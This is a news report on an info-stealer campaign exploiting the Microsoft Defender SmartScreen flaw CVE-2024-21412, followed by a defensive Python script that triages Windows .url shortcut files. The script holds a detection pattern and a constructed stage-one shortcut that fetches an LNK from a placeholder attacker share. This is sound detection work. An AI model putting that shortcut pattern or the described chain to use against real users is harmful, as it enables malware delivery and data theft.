24 July 2024

Microsoft Defender SmartScreen bug exploited to spread info-stealers


A recently patched security vulnerability in Microsoft Defender SmartScreen has been actively exploited in a sophisticated campaign designed to deliver a range of information stealers, including ACR Stealer, Lumma, and Meduza.

The campaign, observed by FortiGuard Labs, leverages the flaw (CVE-2024-21412) to download malicious executable files. The flaw is a security-restriction bypass that lets attackers evade SmartScreen protection and deliver malicious payloads. Microsoft addressed this vulnerability in its February 2024 monthly security updates.

The attackers initiate the process by enticing victims to click on a crafted link to a URL file, which then downloads an LNK file. This LNK file subsequently downloads an executable containing an HTML Application (HTA) script.

Once executed, the script decodes and decrypts PowerShell code to fetch the final URLs, decoy PDF files, and a malicious shellcode injector. The final stealer is then injected into legitimate processes, initiating malicious activities and sending the stolen data to a command-and-control (C2) server.

FortiGuard Labs has detected this campaign targeting users in North America, Spain, and Thailand. The threat actors have developed different injectors to evade detection and utilize various PDF files to specifically target these regions, the company said.
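The chain above begins with a Windows Internet Shortcut (.url) file whose target fetches an LNK rather than a web page. The following triage heuristic is an added example, not code from FortiGuard Labs or the report: it parses constructed .url contents and flags the two traits of that first stage (a file-share target and a target that is itself a shortcut or executable). The extension list and the sample hostnames are assumptions.

```python
"""Triage heuristic for Windows Internet Shortcut (.url) files.

Added example (not from the FortiGuard report): flags .url files whose
target is a file share or points directly at an LNK/HTA/EXE, the shape
of the first delivery stage described in the campaign write-up.
"""
import configparser
from typing import List, Optional
from urllib.parse import urlparse

# Assumption: a shortcut a user was asked to click should open a web page,
# not one of these artifacts. Tune the list for your environment.
SUSPICIOUS_EXT = (".lnk", ".url", ".hta", ".exe", ".js", ".vbs")


def parse_url_file(text: str) -> Optional[str]:
    """Return the URL= value of the [InternetShortcut] section, or None."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    # Option names are case-insensitive in configparser; the section is not.
    return cp.get("InternetShortcut", "URL", fallback=None)


def triage_url_file(text: str) -> List[str]:
    """Return human-readable reasons the shortcut looks like a delivery stage."""
    reasons: List[str] = []
    url = parse_url_file(text)
    if url is None:
        return ["unparseable or missing URL= entry"]
    url = url.strip()
    parsed = urlparse(url)
    path = parsed.path.lower()
    if parsed.scheme == "file" or url.startswith("\\\\"):
        reasons.append("target is a file share (file:// or UNC), not a web page")
    if path.endswith(SUSPICIOUS_EXT):
        name = path.rsplit("/", 1)[-1]
        reasons.append(f"target is a shortcut/executable artifact: {name}")
    return reasons


# Constructed samples (hostnames are placeholders, not real indicators).
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://example.com/report.html\n"
STAGE1_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=file://share.attacker.invalid/pub/invoice.lnk\n"
    "IconIndex=13\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_URL_FILE), ("stage1", STAGE1_URL_FILE)):
        print(label, triage_url_file(sample) or ["no findings"])
```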
